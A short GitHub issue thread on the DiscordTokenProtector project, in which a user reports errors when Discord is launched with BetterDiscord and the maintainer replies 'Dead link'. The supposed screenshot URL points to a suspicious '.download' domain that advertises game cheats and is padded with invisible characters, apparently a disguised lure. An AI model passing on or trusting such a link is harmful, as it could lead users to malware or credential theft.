### ISSUE TITLE
DTP is showing errors when launching with BetterDiscord

### ISSUE THREAD

**Issue by abashir7866** [andro2157/DiscordTokenProtector#51]
I have BetterDiscord installed and when I try to launch discord through DTP it says "6 errors found". The errors are all new directories and files which i believe to be related with betterdiscord. How can i fix it? 
Heres a screenshot with the errors
https://minecraft-legit-cheat-free-no-rat-real-bypass.download/‍‍⁠‌‌‍‌​‍​​‍‍​‌‍‌​‍‍⁠‌​‌⁠⁠‌‍‌‌​

**Comment by andro2157** [comment]
Dead link
